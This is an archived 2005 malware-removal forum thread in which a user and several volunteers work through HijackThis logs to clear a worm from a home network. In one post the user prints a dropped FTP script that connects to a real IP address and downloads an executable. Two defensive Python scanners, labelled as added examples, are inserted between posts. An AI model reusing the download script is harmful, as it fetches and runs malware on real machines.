
A network virus that just won't quit [HijackThis Log]

Discussion in 'Malware and Virus Removal Archive' started by marty, 2005/03/22.

Thread Status:
Not open for further replies.
  1. 2005/03/22
    marty

    marty Inactive Thread Starter

    Joined:
    2002/01/20
    Messages:
    233
    Likes Received:
    0
    I have a LAN with 7 boxes on it now. My office has 5

    1 xp home
    2 fbsd
    1 linux rh 9
    1 mac os 9

    and there are two in other rooms of the house my kids use which I suspect is where the trouble began. They're both running xp home also, and I've been fighting this bug for months now. Hoping maybe to finally get it the (*&#%%#@ off my network.

    I have noticed veritas.exe running, files TFTPnnnn.exe's showing up on my system folder e.g.

    Directory of C:\WINDOWS\system32

    09/03/2002 12:06 PM 16,896 tftp.exe
    03/22/2005 11:51 AM 0 TFTP2544
    03/21/2005 07:00 PM 0 TFTP3764

    and Eudora freezing and crashing. My system is unstable, my bandwidth gets chewed up, and I've had to shut down voluntarily when leaving my desk because otherwise the thing's frozen and I have to shut down by holding down the power switch when I get back.

    Am running an up to date AVG, which found and clobbered an IRC bot earlier today, and SpyBot S&D which reports the following DSO exploit - which after I remove it reports doing so but keeps coming back.


    --- Search result list ---
    DSO Exploit: Data source object exploit (Registry change, nothing done)
    HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

    DSO Exploit: Data source object exploit (Registry change, nothing done)
    HKEY_USERS\S-1-5-21-117609710-796845957-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

    DSO Exploit: Data source object exploit (Registry change, nothing done)
    HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

    DSO Exploit: Data source object exploit (Registry change, nothing done)
    HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

    DSO Exploit: Data source object exploit (Registry change, nothing done)
    HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3


    Where do I go from here?

    Marty
     
  2. 2005/03/22
    Arie

    Arie Administrator Administrator Staff

    Joined:
    2001/12/27
    Messages:
    15,174
    Likes Received:
    412
    Arie,


  4. 2005/03/23
    marty

    marty Inactive Thread Starter

    Joined:
    2002/01/20
    Messages:
    233
    Likes Received:
    0
    follow up to hard infection trouble

    I've followed the instructions as Arie directed and posted my HijackThis log below. The one that I wonder if it's suspicious is

    HKLM\System\CCS\Services\Tcpip\..\{4CD92CBE-03C9-4D9B-8C9F-07011061D61C}: NameServer = 206.72.209.27 206.72.209.56

    Right now things seem to be working ok, but I'll know better in an hour or so when I get back and see if Eudora is still running and my system hasn't frozen up. Will post back at that time.

    Thanks, don't know what I'd do without you folks.

    Marty

    --------------------------------------------

    Logfile of HijackThis v1.99.1
    Scan saved at 11:56:44 AM, on 3/23/2005
    Platform: Windows XP SP1 (WinNT 5.01.2600)
    MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

    Running processes:
    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\csrss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\system32\spoolsv.exe
    C:\WINDOWS\System32\alg.exe
    E:\local\Apache\Apache2\bin\Apache.exe
    F:\PROGRA~1\Security\AVG\avgamsvr.exe
    F:\PROGRA~1\Security\AVG\avgupsvc.exe
    C:\WINDOWS\System32\svchost.exe
    E:\local\Apache\Apache2\bin\Apache.exe
    C:\WINDOWS\Explorer.EXE
    F:\PROGRA~1\Security\AVG\avgcc.exe
    F:\PROGRA~1\Security\AVG\avgemc.exe
    E:\local\Apache\Apache2\bin\ApacheMonitor.exe
    D:\Apps\Eudora\Eudora.exe
    C:\Documents and Settings\Owner\Desktop\hijackthis\HijackThis.exe

    O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
    O4 - HKLM\..\Run: [AVG7_CC] F:\PROGRA~1\Security\AVG\avgcc.exe /STARTUP
    O4 - HKLM\..\Run: [AVG7_EMC] F:\PROGRA~1\Security\AVG\avgemc.exe
    O4 - HKLM\..\Run: [AutoVirusProtection] ciscv.exe
    O4 - HKLM\..\RunServices: [AutoVirusProtection] ciscv.exe
    O4 - Global Startup: Monitor Apache Servers.lnk = E:\local\Apache\Apache2\bin\ApacheMonitor.exe
    O16 - DPF: {80DD2229-B8E4-4C77-B72F-F22972D723EA} (AvxScanOnline Control) - http://www.bitdefender.com/scan/Msie/bitdefender.cab
    O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoftware.com/activescan/as5/asinst.cab
    O17 - HKLM\System\CCS\Services\Tcpip\..\{4CD92CBE-03C9-4D9B-8C9F-07011061D61C}: NameServer = 206.72.209.27 206.72.209.56
    O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll
    O23 - Service: Apache2 - Unknown owner - E:\local\Apache\Apache2\bin\Apache.exe" -k runservice (file missing)
    O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - F:\PROGRA~1\Security\AVG\avgamsvr.exe
    O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - F:\PROGRA~1\Security\AVG\avgupsvc.exe
     
  5. 2005/03/23
    marty

    marty Inactive Thread Starter

    Joined:
    2002/01/20
    Messages:
    233
    Likes Received:
    0
    not fixed

    Ok, Eudora froze up on me minutes after posting. Is it that nameserver in my registry that HijackThis reported?

    Marty
     
  6. 2005/03/24
    markp62

    markp62 Geek Member Alumni

    Joined:
    2002/05/01
    Messages:
    4,012
    Likes Received:
    16
    About your nameserver, it appears to be your internet access provider.

    The below are your problem, believe me that these aren't AVG files.

    O4 - HKLM\..\Run: [AutoVirusProtection] ciscv.exe
    O4 - HKLM\..\RunServices: [AutoVirusProtection] ciscv.exe

    But you should get Killbox, and use it to terminate it before removal of the lines.

    It would be a good idea to install SP2 for XP.
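The tell markp62 is pointing at is visible in the O4 lines themselves: the two ciscv.exe entries carry no path at all, and one of them lives under RunServices. As an added example that is not part of this thread, the following Python triages HijackThis O4 registry lines on exactly those signals; the sample input is constructed from the shape of the log above, and the rules are general heuristics, not HijackThis's own logic.

```python
import re

# Constructed sample input, modelled on the O4 lines in the thread's log
# (not the original log file): two AVG entries and the two ciscv.exe entries.
SAMPLE_O4_LINES = r"""
O4 - HKLM\..\Run: [AVG7_CC] F:\PROGRA~1\Security\AVG\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [AVG7_EMC] F:\PROGRA~1\Security\AVG\avgemc.exe
O4 - HKLM\..\Run: [AutoVirusProtection] ciscv.exe
O4 - HKLM\..\RunServices: [AutoVirusProtection] ciscv.exe
"""

O4_RE = re.compile(
    r"^O4 - (?P<hive>HKLM|HKCU)\\\.\.\\(?P<key>Run\w*): \[(?P<name>[^\]]*)\] (?P<cmd>.*)$"
)

def parse_o4(line):
    """Split one HijackThis O4 registry line into hive, key, value name and executable."""
    m = O4_RE.match(line.strip())
    if not m:
        return None
    cmd = m.group("cmd")
    # A quoted path is the first quoted token; otherwise the executable is the first word.
    exe = cmd.split('"')[1] if cmd.startswith('"') else cmd.split(" ")[0]
    return {"hive": m.group("hive"), "key": m.group("key"),
            "name": m.group("name"), "exe": exe, "cmd": cmd}

def triage_o4(log_text):
    """Return [(entry, [reasons])] for O4 entries that deserve a closer look."""
    entries = [e for e in map(parse_o4, log_text.splitlines()) if e]
    # Value names that appear under more than one Run* key (worms often write both).
    seen_keys = {}
    for e in entries:
        seen_keys.setdefault(e["name"].lower(), set()).add(e["key"].lower())
    findings = []
    for e in entries:
        reasons = []
        if "\\" not in e["exe"]:
            reasons.append("bare filename with no path: resolved through PATH, "
                           "typically a file dropped into system32")
        if e["key"].lower() == "runservices":
            reasons.append("RunServices is a Win9x-era key that XP ignores; "
                           "legitimate XP software rarely writes it")
        if len(seen_keys[e["name"].lower()]) > 1:
            reasons.append("same value name registered under several Run* keys")
        if reasons:
            findings.append((e, reasons))
    return findings
```

On the sample above only the two ciscv.exe entries are reported; the AVG entries, which carry full paths under a single key, are left alone.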
     
  7. 2005/03/24
    marty

    marty Inactive Thread Starter

    Joined:
    2002/01/20
    Messages:
    233
    Likes Received:
    0
    Hi Mark,

    Thanks to the folks on this BBS I may be getting somewhere. First, I've removed the following from my registry entirely, and also from my HD:

    veritas.exe
    mspn.exe
    mspn32.exe
    ciscv.exe

    Since none of these were running according to Security Task Mgr v1.6e or IARSN TaskInfo v6,0,1,134 I had nothing to do afaik with Killbox, though I've now got it on my box.

    Can you tell me what's been on my box, and if I might still have it?


    Marty

    [Current] Logfile of HijackThis v1.99.1
    Scan saved at 10:15:51 AM, on 3/24/2005
    Platform: Windows XP SP1 (WinNT 5.01.2600)
    MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

    Running processes:
    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\csrss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\system32\spoolsv.exe
    C:\WINDOWS\System32\alg.exe
    E:\local\Apache\Apache2\bin\Apache.exe
    F:\PROGRA~1\Security\AVG\avgamsvr.exe
    F:\PROGRA~1\Security\AVG\avgupsvc.exe
    C:\WINDOWS\System32\svchost.exe
    E:\local\Apache\Apache2\bin\Apache.exe
    C:\WINDOWS\Explorer.EXE
    F:\PROGRA~1\Security\AVG\avgcc.exe
    F:\PROGRA~1\Security\AVG\avgemc.exe
    E:\local\Apache\Apache2\bin\ApacheMonitor.exe
    D:\Apps\Eudora\Eudora.exe
    D:\APPS\FIREFOX\FIREFOX.EXE
    C:\DOCUMENTS AND SETTINGS\OWNER\DESKTOP\KillBox.exe
    F:\Maint\HijackThis.exe
    D:\Apps\Textpad\TextPad.exe

    O4 - HKLM\..\Run: [AVG7_CC] F:\PROGRA~1\Security\AVG\avgcc.exe /STARTUP
    O4 - HKLM\..\Run: [AVG7_EMC] F:\PROGRA~1\Security\AVG\avgemc.exe
    O4 - Global Startup: Monitor Apache Servers.lnk = E:\local\Apache\Apache2\bin\ApacheMonitor.exe
    O16 - DPF: {80DD2229-B8E4-4C77-B72F-F22972D723EA} (AvxScanOnline Control) - http://www.bitdefender.com/scan/Msie/bitdefender.cab
    O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoftware.com/activescan/as5/asinst.cab
    O17 - HKLM\System\CCS\Services\Tcpip\..\{4CD92CBE-03C9-4D9B-8C9F-07011061D61C}: NameServer = 206.72.209.27 206.72.209.56
    O23 - Service: Apache2 - Unknown owner - E:\local\Apache\Apache2\bin\Apache.exe" -k runservice (file missing)
    O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - F:\PROGRA~1\Security\AVG\avgamsvr.exe
    O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - F:\PROGRA~1\Security\AVG\avgupsvc.exe
     
  8. 2005/03/24
    marty

    marty Inactive Thread Starter

    Joined:
    2002/01/20
    Messages:
    233
    Likes Received:
    0
    Generic Host Process still crashing

    Don't know if this is part of my old problem, otherwise my system has been quite stable the last few hours.

    The popup says

    "Generic Host Process for Win32 Services has encountered a problem and needs to close. We are sorry for the inconvenience. "

    Here's a new HiJackThis log:

    Logfile of HijackThis v1.99.1
    Scan saved at 11:54:25 AM, on 3/24/2005
    Platform: Windows XP SP1 (WinNT 5.01.2600)
    MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

    Running processes:
    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\csrss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\system32\spoolsv.exe
    C:\WINDOWS\System32\alg.exe
    E:\local\Apache\Apache2\bin\Apache.exe
    F:\PROGRA~1\Security\AVG\avgamsvr.exe
    F:\PROGRA~1\Security\AVG\avgupsvc.exe
    C:\WINDOWS\System32\svchost.exe
    E:\local\Apache\Apache2\bin\Apache.exe
    C:\WINDOWS\Explorer.EXE
    F:\PROGRA~1\Security\AVG\avgcc.exe
    F:\PROGRA~1\Security\AVG\avgemc.exe
    E:\local\Apache\Apache2\bin\ApacheMonitor.exe
    D:\Apps\Eudora\Eudora.exe
    D:\APPS\FIREFOX\FIREFOX.EXE
    D:\Apps\Textpad\TextPad.exe
    D:\Apps\TaskInfo 6.x\TaskInfo.exe
    C:\WINDOWS\System32\dwwin.exe
    F:\Maint\HijackThis.exe

    O4 - HKLM\..\Run: [AVG7_CC] F:\PROGRA~1\Security\AVG\avgcc.exe /STARTUP
    O4 - HKLM\..\Run: [AVG7_EMC] F:\PROGRA~1\Security\AVG\avgemc.exe
    O4 - Global Startup: Monitor Apache Servers.lnk = E:\local\Apache\Apache2\bin\ApacheMonitor.exe
    O16 - DPF: {80DD2229-B8E4-4C77-B72F-F22972D723EA} (AvxScanOnline Control) - http://www.bitdefender.com/scan/Msie/bitdefender.cab
    O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoftware.com/activescan/as5/asinst.cab
    O17 - HKLM\System\CCS\Services\Tcpip\..\{4CD92CBE-03C9-4D9B-8C9F-07011061D61C}: NameServer = 206.72.209.27 206.72.209.56
    O23 - Service: Apache2 - Unknown owner - E:\local\Apache\Apache2\bin\Apache.exe" -k runservice (file missing)
    O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - F:\PROGRA~1\Security\AVG\avgamsvr.exe
    O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - F:\PROGRA~1\Security\AVG\avgupsvc.exe
     
  9. 2005/03/25
    marty

    marty Inactive Thread Starter

    Joined:
    2002/01/20
    Messages:
    233
    Likes Received:
    0
    hard bug to remove

    I posted previously http://www.windowsbbs.com/showthread.php?p=229821#post229821
    but this is still a problem.

    My symptom now is that my computer will freeze up after a while. I also notice something called TFTPnnnn.exe showing up on my C:\WINDOWS\system32 folder, sometimes it's 0 bytes, sometimes it's actually got something in it.

    Have followed the procedures Arie referred me to on that previous post, and my latest runs showed nothing questionable.

    Marty
     
  10. 2005/03/25
    noahdfear

    noahdfear Inactive

    Joined:
    2003/04/06
    Messages:
    12,178
    Likes Received:
    15
    Hi Marty,

    You really should have stuck with the original thread, but.........

    Go here, skip the details and run the tool. Then go directly to Windows Update and install all critical updates offered (choose the Express Install). Reboot when prompted and go back as many times as necessary to have no more offered.

    Below is info for the entry you inquired about.

    O17 - HKLM\System\CCS\Services\Tcpip\..\{4CD92CBE-03C9-4D9B-8C9F-07011061D61C}: NameServer = 206.72.209.27 206.72.209.56

    OrgName: ComputerWorks, Inc.
    OrgID: COMPUT-105
    Address: 11 North Pearl St.
    City: Albany
    StateProv: NY
    PostalCode: 12207
    Country: US

    Your ISP?

    Incidentally, this entry

    O23 - Service: Apache2 - Unknown owner - E:\local\Apache\Apache2\bin\Apache.exe" -k runservice (file missing)

    shows the file missing for the Apache service. You may consider re-installing.

    Let us know how things are when done.
     
  11. 2005/03/25
    markp62

    markp62 Geek Member Alumni

    Joined:
    2002/05/01
    Messages:
    4,012
    Likes Received:
    16
    I merged the two threads.
    You may find out which service has done that by right clicking My Computer and select Manage. Then see what the System log, under the Event Viewer can tell you.


    BTW, about the DSO exploits, that is not uncommon for Spybot to do that.
     
  12. 2005/03/26
    marty

    marty Inactive Thread Starter

    Joined:
    2002/01/20
    Messages:
    233
    Likes Received:
    0
    Will follow the advice from Noah but right now am under a deadline, which has been exacerbated by these problems.

    I have, believe it or not been running stable and smooth all day long. First time in weeks. But the party's not over apparently.

    Yesterday I removed tftp.exe and cache.exe from my system32 folder... and assume that's what has made the difference.

    But... as I've gotten into the habit of looking for new stuff written onto system32 by "the gremlins", just found a little file called 'i' - which I removed. Here's what's in the file:

    -------------------------


    open 160.78.90.10 14920
    user 1 1
    get eraseme_24478.exe
    quit


    -------------------------

    I did a tracert of the ip addr and the last hops are

    -------------------------


    14 304 ms 323 ms 311 ms pal6-pal7-racc1.pal.seabone.net [195.22.218.227]

    15 311 ms 311 ms 317 ms customer-side-garr-1-it-pal6.pal.seabone.net [195.22.218.102]
    16 320 ms 629 ms 329 ms rt-ct1-rt-na1.na1.garr.net [193.206.134.9]
    17 2543 ms 1661 ms 323 ms rt-na1-rt-ba1.ba1.garr.net [193.206.134.38]
    18 1409 ms 569 ms 323 ms rt-ba1-rt-bo1.bo1.garr.net [193.206.134.77]
    19 323 ms 419 ms 917 ms rt1-bo1-ru-unipr.bo1.garr.net [193.206.128.94]
    20 912 ms 329 ms 329 ms 160.78.253.253
    21 335 ms 377 ms 353 ms 160.78.254.251
    22 3370 ms 332 ms 330 ms 160.78.90.10

    Trace complete.


    -----------------------------------------

    Da, or nyet?


    Marty
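The file 'i' above is an FTP command script (open / user / get / quit), the kind of thing a worm feeds to the built-in ftp client to pull down its next payload, and the 0-byte TFTPnnnn files from the first post are the leftovers of the same fetch done over TFTP. As an added example, not something from this thread or any of the tools mentioned in it, this Python scans one folder for both artefacts and pulls the host, port and fetched file names out of any script it finds, which is exactly the information an abuse report needs; the sample folder it builds is constructed, with a placeholder address instead of the one Marty found.

```python
import os
import re
import tempfile

# Constructed sample in the shape of the 'i' file quoted in the thread; the
# address and file name are placeholders, not the values the poster found.
SAMPLE_SCRIPT = "open 192.0.2.10 14920\nuser 1 1\nget eraseme_00000.exe\nquit\n"

FTP_OPEN_RE = re.compile(r"^open\s+(?P<host>\S+)(?:\s+(?P<port>\d{1,5}))?$", re.I)
TFTP_DROP_RE = re.compile(r"^tftp\d+(\.exe)?$", re.I)  # TFTPnnnn / TFTPnnnn.exe, not tftp.exe

def parse_ftp_script(text):
    """Return {host, port, files} if text is an ftp.exe -s: style command script, else None."""
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    m = FTP_OPEN_RE.match(lines[0]) if len(lines) >= 3 else None
    if not m:
        return None
    verbs = [l.split()[0].lower() for l in lines[1:]]
    # A dropper script logs in and fetches something; anything else is not of interest here.
    if "user" not in verbs or not {"get", "mget"} & set(verbs):
        return None
    files = [l.split(maxsplit=1)[1] for l in lines[1:] if l.lower().startswith(("get ", "mget "))]
    return {"host": m.group("host"), "port": int(m.group("port") or 21), "files": files}

def scan_dir(path, max_size=4096):
    """Scan one directory (non-recursive) for FTP command scripts and TFTP download leftovers."""
    findings = []
    for name in sorted(n for n in os.listdir(path) if os.path.isfile(os.path.join(path, n))):
        full = os.path.join(path, name)
        size = os.path.getsize(full)
        if TFTP_DROP_RE.match(name):
            findings.append((name, "tftp download artefact", {"size": size}))
        elif 0 < size <= max_size:  # command scripts are tiny; skip empty and large files
            with open(full, encoding="ascii", errors="replace") as fh:
                ind = parse_ftp_script(fh.read())
            if ind:
                findings.append((name, "ftp command script", ind))
    return findings

def demo():
    """Build a constructed sample folder, scan it and return the findings."""
    d = tempfile.mkdtemp()
    samples = {"i": SAMPLE_SCRIPT,                      # the dropper script
               "TFTP2544": "",                           # 0-byte file like the listing in the thread
               "readme.txt": "open the door\nand leave\nquit\n"}  # benign text starting with 'open'
    for name, body in samples.items():
        with open(os.path.join(d, name), "w") as fh:
            fh.write(body)
    return scan_dir(d)
```

The scanner never contacts the host it extracts; it only records it, so the output can go straight into a report to the abuse contact for that address range.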
     
  13. 2005/03/26
    noahdfear

    noahdfear Inactive

    Joined:
    2003/04/06
    Messages:
    12,178
    Likes Received:
    15
  14. 2005/03/26
    marty

    marty Inactive Thread Starter

    Joined:
    2002/01/20
    Messages:
    233
    Likes Received:
    0
    Noah,

    The version with email addy's in says

    To notify abuse mailto: cert@garr.it

    Should I write them and send a copy of the file? Anyone seen this type of file before? What's going on, and how long before my computer's not mine again?

    Marty
     